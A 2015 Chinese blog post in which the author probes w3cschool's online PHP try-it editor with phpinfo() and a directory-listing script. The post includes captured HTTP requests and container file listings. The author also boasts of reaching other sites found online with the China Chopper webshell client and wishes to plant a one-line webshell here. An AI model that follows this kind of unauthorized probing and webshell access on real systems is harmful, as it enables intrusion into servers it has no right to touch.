注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

一个php代码执行漏洞  

2015-05-22 12:33:59|  分类: Web安全 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
之前捡到两个php的漏洞站点,网上直接搜的,用菜刀居然连上了。。。
在这之前可一直没用过菜刀这工具,php也不了解,linux也不太会用,漏洞来的也太容易了。
既然不会就去w3cshool了解下php,刚开始就发现了一个php代码执行的漏洞。
这可是我第一个php漏洞了。这个不知道用菜刀怎么连,因为我不知道try目录对应哪个文件夹,
没法把一句话写到那里去,也可能不是同一台机器。。。主要是php不会。

http://www.w3cschool.cc/try/showphp2.php?filename=demo_syntax
一个php代码执行漏洞 - appall - 且行且记录
  
<!DOCTYPE html>
<html>
<body>

<h1>My first PHP page</h1>
<?php
phpinfo();
?>  

</body>
</html>

输出
phpinfo() PHP Version => 5.5.9-1ubuntu4 System => Linux 28ba11703ccb 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 。。。。。。

用一个代码替换左边框的内容执行,输出目录内容。
<?php 
$d = dir(getcwd());

echo "Handle: " . $d->handle . "<br>";
echo "Path: " . $d->path . "<br>";

while (($file = $d->read()) !== false){ 
echo "filename: " . $file . "<br>"; 
$d->close(); 
?>
Handle: Resource id #5
Path: /
filename: .
filename: ..
filename: usercode
filename: .dockerinit
filename: .dockerenv
filename: dev
filename: etc
filename: usr
filename: var
filename: lib
filename: run
filename: tmp
filename: .npm
filename: bin
filename: .bash_history
filename: opt
filename: srv
filename: lib64
filename: sys
filename: sbin
filename: boot
filename: home
filename: proc
filename: root
filename: media
filename: mnt

抓包测试一下
一个php代码执行漏洞 - appall - 且行且记录

POST /compile.php HTTP/1.1Host: tool.w3cschool.ccConnection: keep-aliveContent-Length: 162Accept: */*Origin: http://www.w3cschool.ccUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://www.w3cschool.cc/try/showphp2.php?filename=demo_introAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8code=%3C!DOCTYPE+html%3E%0A%3Chtml%3E%0A%3Cbody%3E%0A%0A%3C%3Fphp%0Aecho+'AAAAAAAAAAAAAAAAAAAAAAAAAAA'%0A%3F%3E++%0A%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A&language=3HTTP/1.1 200 OKServer: Tengine/1.3.0Date: Mon, 18 May 2015 08:15:41 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.3.15Access-Control-Allow-Origin: *fe{"output":"<!DOCTYPE html>\n<html>\n<body>\n\nAAAAAAAAAAAAAAAAAAAAAAAAAAA  \n\n</body>\n</html>\n","langid":"3","code":"<!DOCTYPE html>\n<html>\n<body>\n\n<?php\necho 'AAAAAAAAAAAAAAAAAAAAAAAAAAA'\n?>  \n\n</body>\n</html>\n","errors":"","time":" .05\n"}0


POST /compile.php HTTP/1.1Host: tool.w3cschool.ccConnection: keep-aliveContent-Length: 55Accept: */*Origin: http://www.w3cschool.ccUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://www.w3cschool.cc/try/showphp2.php?filename=demo_introAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8code=%3C%3Fphp%0Aecho+'qqqqqq'%0A%3F%3E++%0A&language=3HTTP/1.1 200 OKServer: Tengine/1.3.0Date: Mon, 18 May 2015 08:26:25 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.3.15Access-Control-Allow-Origin: *66{"output":"qqqqqq  \n","langid":"3","code":"<?php\necho 'qqqqqq'\n?>  \n","errors":"","time":" .05\n"}0
  评论这张
 
阅读(83)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017